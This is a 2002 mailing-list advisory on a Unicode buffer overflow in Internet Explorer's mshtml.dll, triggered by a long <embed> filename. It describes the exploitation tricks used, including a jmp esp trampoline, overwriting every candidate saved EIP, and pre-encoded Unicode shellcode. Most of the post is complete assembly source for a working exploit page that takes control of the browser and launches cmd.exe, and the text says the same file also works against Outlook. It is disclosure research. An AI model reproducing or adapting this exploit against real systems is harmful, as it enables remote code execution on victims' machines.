Details and exploitation of buffer overflow in mshtml.dll (and a few side notes on Unicode overflows in general)

From: 3APA3A (3APA3A@SECURITY.NNOV.RU)
Date: 02/27/02


Date: Wed, 27 Feb 2002 16:15:32 +0300
From: 3APA3A <3APA3A@SECURITY.NNOV.RU>
To: vuln-dev@securityfocus.com, BUGTRAQ@securityfocus.com

Dear,

The advisory was originally posted in [1-3] two weeks ago, so I think
enough time has passed to publish some details, especially since [4,5]
contain enough information to rediscover the vulnerability.

ERRor <error(at)pochtamt.ru> discovered that IE 5.5 and 6.0 in some
cases crash on

 <embed src="filename.AAAAAAAAAA<lot of 'A's>">

with EIP 0x41004100.
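
The reported value follows from the way ASCII text is widened. The
sketch below (Python, for illustration only, not part of the exploit)
widens a run of 'A's to UTF-16LE and reads a 32-bit little-endian value
from it at an even and at an odd byte offset. That the saved EIP sits at
an odd byte offset relative to the widened string is an assumption, not
something stated above; it is simply the reading that reproduces
0x41004100. The helper name dword_at is hypothetical.

```python
import struct


def dword_at(data: bytes, offset: int) -> int:
    """Read a 32-bit little-endian value from data at a byte offset."""
    return struct.unpack_from("<I", data, offset)[0]


# Each ASCII 'A' (0x41) becomes the two bytes 0x41 0x00 in UTF-16LE.
widened = ("A" * 8).encode("utf-16-le")

aligned = dword_at(widened, 0)     # bytes 41 00 41 00
misaligned = dword_at(widened, 1)  # bytes 00 41 00 41 (assumed alignment)

print(widened.hex())
print(hex(aligned), hex(misaligned))
```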

The overflow occurs when IE concatenates the file extension to
"Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappingOverride\"
with wcscat().
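
For contrast, here is a minimal sketch of the length check that an
unbounded wcscat() skips. It is a Python model, not the mshtml.dll code:
the buffer capacity BUFFER_CHARS is a hypothetical value (the real size
is not given here), and the names wide_len and build_mapping_key are
made up for the example.

```python
KEY_PREFIX = ("Software\\Microsoft\\Internet Explorer\\"
              "EmbedExtnToClsidMappingOverride\\")
BUFFER_CHARS = 260  # hypothetical capacity in wide characters


def wide_len(text: str) -> int:
    """Length of text in 16-bit code units, as a wide-char API counts it."""
    return len(text.encode("utf-16-le")) // 2


def build_mapping_key(extension: str, capacity: int = BUFFER_CHARS) -> str:
    """Return prefix + extension only if it fits, terminator included."""
    needed = wide_len(KEY_PREFIX) + wide_len(extension) + 1  # +1 for 0x0000
    if needed > capacity:
        raise ValueError(
            f"key needs {needed} wide chars, buffer holds {capacity}")
    return KEY_PREFIX + extension


print(build_mapping_key("swf"))
```

A long "extension" such as "A" * 1000 raises ValueError instead of
running past the end of the buffer.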

There is another input validation bug in Internet Explorer: it fails to
detect that a file has no extension. In that case it looks for a dot
before the filename and treats everything after that dot as the
extension. So it is possible to overflow the buffer with a long filename
that has no extension.
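
The difference between the two lookups can be sketched as follows. This
is a Python model of the behaviour described above, not the actual
Internet Explorer code; both function names are hypothetical.

```python
def naive_extension(src: str) -> str:
    """Flawed lookup: everything after the last dot anywhere in src."""
    dot = src.rfind(".")
    return src[dot + 1:] if dot != -1 else ""


def filename_extension(src: str) -> str:
    """Stricter lookup: only a dot in the last path component counts."""
    name = src.replace("\\", "/").rsplit("/", 1)[-1]
    dot = name.rfind(".")
    return name[dot + 1:] if dot != -1 else ""


url = "http://www.security.nnov.ru/files/iebo/X"
print(repr(naive_extension(url)))     # dot found in the host name
print(repr(filename_extension(url)))  # file name has no dot at all
```

With the naive lookup the "extension" starts inside the host name, so
its length is controlled by the path and filename that follow.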

The rest of this paper is for vuln-dev :)

This is the kind of Unicode buffer overflow that was discussed so much
on Vuln-Dev some time ago. Usually we do not code or release exploits
for "standard" holes like format strings or overflows; we only point out
that the vulnerability is exploitable. The only reason for this paper is
to show how easy exploitation of this sort of bug is. We do not plan to
release any exploits of this kind in the future.

There are a few problems for anyone who wants to create an exploit:

1. All data is converted to Unicode, that is, 'A' is converted to
0x0041.
2. The address of the shellcode differs depending on the number of open
Internet Explorer windows, the Windows and Internet Explorer versions,
and the patches installed.
3. The offset of the saved EIP on the stack differs between Internet
Explorer versions before and after IE5.5SP2.
4. A couple of small problems we will not describe, because leaving
them out may help to stop a virus or a script kiddie with an exploit if
one appears in the wild.

Now you can try to exploit this bug by yourself... I had a working
exploit after half an hour without using any debugger/disassembler :)

One of the first Unicode overflows found in the wild was the
vulnerability in an IIS ISAPI filter found by eEye [6]. They failed to
make a really working exploit, saying that exploiting this kind of bug
is hard. The bug was successfully exploited by hsj and later by the
authors of the CodeRed worm. This brings us to the fact: EXPLOITATION OF
UNICODE OVERFLOWS IS EASY. There is an easy way to bypass the conversion
of the shellcode to Unicode: it should be in Unicode already. This was
the trick used by CodeRed (a wonderful analysis of CodeRed was made by
Andrey Kolishak in [7]). I wrote about Unicode HTML in [8] (in fact, [8]
was released to prevent the possible impact of this paper, but it did
not succeed, because many filters still do not check Unicode HTML).
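
On the filtering side, the point about Unicode HTML can be illustrated
with a short sketch. It assumes a hypothetical filter that looks for the
byte string "<embed"; a document saved as UTF-16 with a byte order mark
passes that check unless the filter decodes it first. The function names
are made up for the example, and a real filter would also have to handle
UTF-7, missing BOMs and charset declarations.

```python
import codecs


def decode_html(raw: bytes) -> str:
    """Decode according to a leading byte order mark, if there is one."""
    if raw.startswith(codecs.BOM_UTF16_LE):
        return raw[2:].decode("utf-16-le", errors="replace")
    if raw.startswith(codecs.BOM_UTF16_BE):
        return raw[2:].decode("utf-16-be", errors="replace")
    if raw.startswith(codecs.BOM_UTF8):
        return raw[3:].decode("utf-8", errors="replace")
    return raw.decode("latin-1")  # no BOM: treat as single-byte text


def has_embed_tag(raw: bytes) -> bool:
    """Check for an <embed> tag after decoding, not on the raw bytes."""
    return "<embed" in decode_html(raw).lower()


# Harmless sample: an <embed> tag stored as UTF-16LE with a BOM.
sample = codecs.BOM_UTF16_LE + '<embed src="x">'.encode("utf-16-le")

print(b"<embed" in sample)    # raw byte match
print(has_embed_tag(sample))  # match after decoding
```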

Andrey pointed out an easy (and well-known) way to avoid the second
problem, the hardcoded shellcode address. Instead of overwriting the
saved EIP with the address of our shellcode, we can use an indirect
jump: overwrite EIP with the address of an instruction in the memory
space of some DLL that jumps back to our code via ebp or esp (ebp may be
used when exploiting format strings). We found jmp esp (FFE4) in all
versions of kernel32.dll and in one version of msvcrt.dll (6.10.8924.0).
This version of the DLL does not depend on Internet Explorer and is
present in most installations of Windows NT 4.0 and Windows 2000 we
checked (but never in Windows 95/98/ME/XP), so we used it.

The third problem was solved by overwriting all possible EIPs and using
a few NOPs and the

  call xxxx
  ...
xxxx:
  pop ebp

combination to get the exact address of our shellcode.

Since the exploit is in Unicode, we do not need to care about '\0'
(0x0000 and 0xFFFF are prohibited, and we have to take care with calls
and far jumps), so we wrote a large shellcode with visual effects. If
you like it, you can download the full version of the dH & SECURITY.NNOV
Matrix screensaver from
http://www.security.nnov.ru/advisories/soft/

The resulting HTML (it works with msvcrt.dll 6.10.8924.0 and does not
depend on the mshtml.dll version, the program used, or the Windows
version) can be obtained from
http://www.security.nnov.ru/files/iebo/matrix.htm

The same file (properly encoded to UTF-7, UTF-8, quoted-printable or
base64) may be used to exploit Outlook Express/Outlook. (I've just
noticed that under Windows 2000 the terminal window sometimes opens in
the background and you need to switch to it... Well... It's not good,
but I can't be bothered to patch it :) ).

Below is source code for matrix.htm:

-=-=-=-=-=-=-=-=- begin matrix.asm -=-=-=-=-=-=-=-=-
;
; matrix.asm - source code for matrix.htm
;
; build:
; tasm matrix.asm /m2
; tlink matrix.obj, matrix.htm /t /3
;
; Authors:
; ERROR: bug discovery
; 3APA3A: idea and coding
; OFFliner: matrix effects and undocumented Windows API
;
; Thanx to Andrey Kolishak for indirect esp jump idea
;
; you can obtain matrix screensaver from
; http://www.security.nnov.ru/matrix
;
;
; eipjmp: overwrites saved EIP for all versions of
; mshtml.dll
; espjmp: gets control after jmp esp and calls code1
; code1: restores EIP from stack after call to ebp
; does some actions and jumps to code2
; code2: does the rest of actions

datap equ (DataTable+080h)
hKernel32 equ LoadL-datap
cCur equ StringTable-datap
SetCCH equ StringTable+4-datap
GetSH equ StringTable+8-datap
Sleep equ StringTable+12-datap
WriteC equ StringTable+16-datap
AllocC equ StringTable+20-datap
SetCDM equ StringTable+24-datap
SetCTA equ StringTable+28-datap
SetCCI equ StringTable+32-datap
WinE equ StringTable+36-datap
ExitP equ StringTable+40-datap

hStdOut equ StringTable+48-datap
dwOldMode equ cCur
conCur equ StringTable+52-datap
cls equ StringTable+56-datap
DWNumChar equ StringTable+60-datap
RegHK equ user-datap

.386
_faked segment para public 'CODE' use32
       assume cs:_faked
start:
_faked ends

_main segment para public 'DATA' use32
       assume cs:_main

prefix:
        begin db 0ffh,0feh ;Unicode prefix
                db "<",0,"e",0,"m",0,"b",0,"e",0,"d",0,0dh,0
                db "s",0,"r",0,"c",0,"=",0,34,0
                db "h",0,"t",0,"t",0,"p",0,":",0,"/",0,"/",0
                db "w",0,"w",0,"w",0,".",0
                db "s",0,"e",0,"c",0,"u",0,"r",0,"i",0,"t",0,"y",0,".",0
                db "n",0,"n",0,"o",0,"v",0,".",0,"r",0,"u",0
                db "/",0,"f",0,"i",0,"l",0,"e",0,"s",0,"/",0
                db "i",0,"e",0,"b",0,"o",0,"/",0,"X",0
                db "!(c)3APA3A"
                db 22 dup(090h)
code1:
        pop ebp
        mov esp,ebx
        xor eax,eax
dataoffset = DataTable - code2
ebpdiff = 80h + dataoffset
        mov ax,ebpdiff
        add ebp,eax ;ebp points to data
        
        lea eax,[ebp+user-datap]
        push eax
        mov ebx,[ebp+LoadL-datap]
        mov eax,[ebx]
        mov [ebp+LoadL-datap],eax
        call eax ;LoadLibraryA("user32.dll")
        lea ebx,[ebp+reg-datap]
        push ebx
        push eax
        mov ebx,[ebp+GetPA-datap]
        mov eax,[ebx]
        mov [ebp+GetPA-datap],eax
        call eax ;GetProcAddress(.,"RegisterHotKey")
        mov [ebp+RegHK],eax
        lea edi,[ebp+rhk-datap]
        movzx esi,byte ptr[edi]
LoopHotkey:
        inc edi
        xor eax,eax
        mov al,[edi]
        push eax
        inc edi
        mov al,[edi]
        push eax
        inc edi
        mov al,[edi]
        push eax
        xor eax,eax
        push eax
        call [ebp+RegHK]
        dec esi
        or esi,esi
        jnz LoopHotKey
        
        lea eax,[ebp+StringTable-datap] ;string "kernel32.dll"
        push eax
        call [ebp+LoadL-datap] ;LoadLibraryA("kernel32.dll")
        mov [ebp+hKernel32],eax ;hKernel32 =

        lea eax, [ebp+SetCCH]
        mov [ebp+cCur],eax ;*cCur = SetCCH
        lea edi,[ebp+funcnum-datap]
        movzx esi,byte ptr[edi] ;esi=funcnum
        inc edi
LoopResolve:
        push edi
        push dword ptr [ebp+Hkernel32]
        call [ebp+GetPA-datap] ;GetProcAddress(edi)
        mov ebx,[ebp+cCur]
        mov [ebx],eax ;save func address
        xor ecx,ecx
        mov cl,4
        add ebx,ecx
        mov [ebp+cCur],ebx ;cCur+=4
        not ecx
        xor eax,eax
        repnz scasb ;find \0
        dec esi
        or esi,esi
        jnz LoopResolve
        

        call [ebp+AllocC] ;AllocConsole()
        push eax ;nonzero if succeed
        xor eax,eax
        push eax
        call [ebp+SetCCH] ;SetConsoleCtrlHandler(NULL,TRUE)
        xor eax,eax
        not eax
        sub al,0Ah
        push eax
        call [ebp+GetSH] ;GetStdHandle(STD_OUTPUT_HANDLE)
        mov [ebp+hStdOut],eax ;hStdOut=
        lea eax,[ebp+dwOldMode]
        push eax
        xor ebx,ebx
        inc ebx
        push ebx
        push dword ptr [ebp+hStdOut]
        call [ebp+SetCDM] ;SetConsoleDisplayMode(hStdOut, 1, &dwOldMode)
        xor ebx,ebx
        mov bl,0Ah
        push ebx
        push dword ptr [ebp+hStdOut]
        call [ebp+SetCTA] ;SetConsoleTextAttribute(hStdOut,FOREGROUND_INTENSITY|FOREGROUND_GREEN)
        xor ebx,ebx
        mov [ebp+ConCur+4],ebx ;ConCur.bVisible = 0 (FALSE)
        mov bl, 100
        mov [ebp+ConCur],ebx ;ConCur.dwSize = 100
        lea eax, [ebp+ConCur]
        push eax
        push dword ptr [ebp+hStdOut]
        call [ebp+SetCCI] ;SetConsoleCursorInfo(hstdOut,&ConCur)
        xor eax,eax
        mov ax,1000
        push eax
        call[ebp+Sleep] ;Sleep(1000);
        xor ebx,ebx
        mov bl, string-datap
        mov eax,ebp
        add eax,ebx
        mov [ebp+cCur],eax ;cCur = string
        mov eax,ebp
        mov bx,datap-empty_string
        sub eax,ebx
        mov [ebp+cls],eax ;set address of empty_string
LOOP1: ;do do
        xor eax,eax
        push eax
        lea ebx,[ebp+DWNumChar]
        push ebx
        inc eax
        push eax
        mov eax,[ebp+cCur]
        push eax
        push dword ptr [ebp+hStdOut]
        call [ebp+WriteC] ;WriteConsole(hStdOut,(void*)cCur,1,&DWNumChar,NULL);
        xor eax,eax
        mov al,100
        mov ecx,[ebp+cCur]
        mov bl,[ecx]
        sub bl,20
        jnz N1
        mov ax,400
N1: mov bl,[ecx]
        sub bl,8
        jnz N2
        mov ax,2100
N2: push eax
        call [ebp+Sleep] ;Sleep((*cCur==' ')?400:(*cCur=='\b')?2100:100)
        mov ecx,[ebp+cCur]
        inc ecx
        mov [ebp+cCur],ecx ;++cCur
        mov bl,[ecx]
        sub bl,9
        jnz LOOP1 ;while(*cCur!='\t');
        call [ebp+cls]
        mov ecx,[ebp+cCur]
        inc ecx
        mov [ebp+cCur],ecx ;++cCur
        mov bl,[ecx]
        sub bl,00Ah
        jnz LOOP1 ;while(*cCur!='\n');
        inc ecx
        xor eax,eax
        push eax
        lea ebx,[ebp+DWNumChar]
        push ebx
        mov al,18
        push eax
        push ecx
        push dword ptr [ebp+hStdOut]
        jmp code2

        
codelength = $ - begin
neednoops = 1d4h - codelength
                db neednoops dup(090h)
eipjmp:

                dd 78024e02h
                dd 78024e02h
                dd 78024e02h
                dd 78024e02h
                dw 9090h
                dd 78024e02h ;EIP for IE < 55SP2

espjmp:

                db 18 dup(090h)
        xor eax,eax ;ESP comes here
        mov ax,0170h
        mov ebx,esp
        sub ebx,eax
        call ebx

code2:
        call [ebp+WriteC]
        xor eax,eax
        mov ax,4000
        push eax
        call [ebp+Sleep]
        call [ebp+cls]
        lea eax,[ebp+cmdexe-datap]
        push eax
        push eax
        call [ebp+WinE]
        xor eax,eax
        push eax
        call [ebp+ExitP]
        
empty_string:
        ; some code can be pasted here
        xor eax,eax
        mov ax,1000
        push eax
        call [ebp+Sleep] ;Sleep(1000)
        xor eax,eax
        push eax
        lea ebx,[ebp+DWNumChar]
        push ebx
        mov al,30
        push eax
        lea eax,[ebp+empty-datap]
        push eax
        push dword ptr [ebp+hStdOut]
        call [ebp+WriteC]
        ret

        

DataTable:

        LoadL dd 780330d0h ;LoadLibraryA import table entry
        GetPA dd 780330cch ;GetProcAddress import table entry

StringTable:

                db "kernel32.dll",0
        funcnum db 10
                db "SetConsoleCtrlHandler",0
                db "GetStdHandle",0
                db "Sleep",0
                db "WriteConsoleA",0
                db "AllocConsole",0
                db "SetConsoleDisplayMode",0
                db "SetConsoleTextAttribute",0
                db "SetConsoleCursorInfo",0
                db "WinExec",0
                db "ExitProcess",0
        user db "user32.dll",0
        reg db "RegisterHotKey",0
        cmdexe db "cmd.exe",0
        rhk db 5
                db 9,1,100,01bh,1,101,13,1,102,05dh,8,103,3,2,104
        empty db 00dh,28 dup(020h),00dh,0
        string db 00dh," Wake Up, Neo...",00dh,009h,0
                db 00dh," The Matrix has you...",00dh,009h,0
                db 00dh," Follow the White Rabbit.",00dh,008h,009h,00ah,0
                db 00dh," Knock, knock...",00dh,0
        
        padding db 32
suffix:
                db 34,0,">",0,00ah
        copy db "(c) 2002 by 3APA3A, ERRor, OFFLiner"

_main ends
   end start
-=-=-=-=-=-=-=-=- end matrix.asm -=-=-=-=-=-=-=-=-

References:

[1] dH & SECURITY.NNOV: buffer overflow in mshtml.dll
    http://www.security.nnov.ru/advisories/mshtml.asp
[2] Microsoft Security Bulletin MS02-005
    http://www.microsoft.com/technet/security/bulletin/MS02-005.asp
[3] CAN-2002-0022
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0022
[4] CERT Advisory CA-2002-04 Buffer Overflow in Microsoft
    Internet Explorer
    http://www.cert.org/advisories/CA-2002-04.html
[5] ISS Alert: Buffer Overflow in Microsoft Internet Explorer
    http://www.security.nnov.ru/search/document.asp?docid=2546
[6] All versions of Microsoft Internet Information Services Remote
    buffer overflow (SYSTEM Level Access)
    http://eeye.com/html/Research/Advisories/AD20010618.html
[7] Andrey Kolishak, History of one vulnerability (in Russian)
    http://www.security.nnov.ru/articles/codered/
[8] Bypassing content filtering software
    http://www.security.nnov.ru/advisories/content.asp

-- 
http://www.security.nnov.ru
         /\_/\
        { , . }     |\
+--oQQo->{ ^ }<-----+ \
|  ZARAZA  U  3APA3A   }
+-------------o66o--+ /
                    |/
You know my name - look up my number (The Beatles)


